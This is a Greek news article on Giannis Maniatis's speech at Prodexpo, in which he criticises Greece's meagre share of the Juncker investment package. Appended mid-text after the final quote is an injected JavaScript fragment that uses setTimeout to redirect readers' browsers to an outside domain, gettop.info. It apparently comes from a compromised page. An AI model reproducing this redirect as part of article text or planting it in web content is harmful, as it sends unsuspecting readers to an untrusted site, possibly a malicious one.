Μανιάτης: Το πακέτο Γιούνκερ ένα από τα επενδυτικά Βατερλώ της κυβέρνησης

0
5

 

Στο πλαίσιο ομιλίας του στο Prodexpo – Συνέδριο για την Ανάπτυξη και Αξιοποίηση της Ακίνητης Περιουσίας ο πρώην υπουργός Περιβάλλοντος Γιάννης Μανιάτης τόνισε πως «χρειαζόμαστε ένα άλλο κράτος, μια άλλη δημόσια Διοίκηση, η οποία αντί να απορροφά κονδύλια και ανθρωποδυνάμεις, προκειμένου να διορίσει νέους δημοσίους υπαλλήλους, μπορεί και πρέπει να λειτουργήσει ως μήτρα που γεννά δουλειές για τον ιδιωτικό τομέα».

Αναφερόμενος στο «πακέτο Γιούνκερ» επεσήμανε πως πρόκειται για ένα «από τα επενδυτικά Βατερλώ της σημερινής κυβέρνησης».

Όπως υπογράμμισε: «Ο πρόεδρος της Ευρωπαϊκής Επιτροπής κ. Γιούνκερ, τον Σεπτέμβριο 2016, μετά από 1 χρόνο εφαρμογής του πακέτου του, ανακοίνωσε στο Ευρωκοινοβούλιο σε όλα τα Κράτη-Μέλη τα πρώτα αποτελέσματα από τη Λιθουανία μέχρι το Λουξεμβούργο. 116 δισ. € επενδύσεις, 100.000 νέες θέσεις εργασίας, 200.000 δάνεια σε μικρομεσαίες Επιχειρήσεις».

Επιπλέον ο κ. Μανιάτης ανέφερε ότι «116 δισ. € επενδύσεις στα 28 Κράτη – Μέλη, στην Ελλάδα πόσα; 0,5 δισ €, οριακά 500 εκατ. €, εκ των οποίων τα 300 εκατ. € της Fraport για τα αεροδρόμια και τα 150 εκατ. € περίπου της Εθνικής Τράπεζας για να φτιάξει ένα Fund για χρηματοδότηση Μικρομεσαίων Επιχειρήσεων, μοναδική επένδυση αυτή της Creta Farm ύψους 15 εκατ. €, λιγότερες από 1.500 θέσεις εργασίας και μηδενικό αποτύπωμα στα δάνεια των μικρομεσαίων επιχειρήσεων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here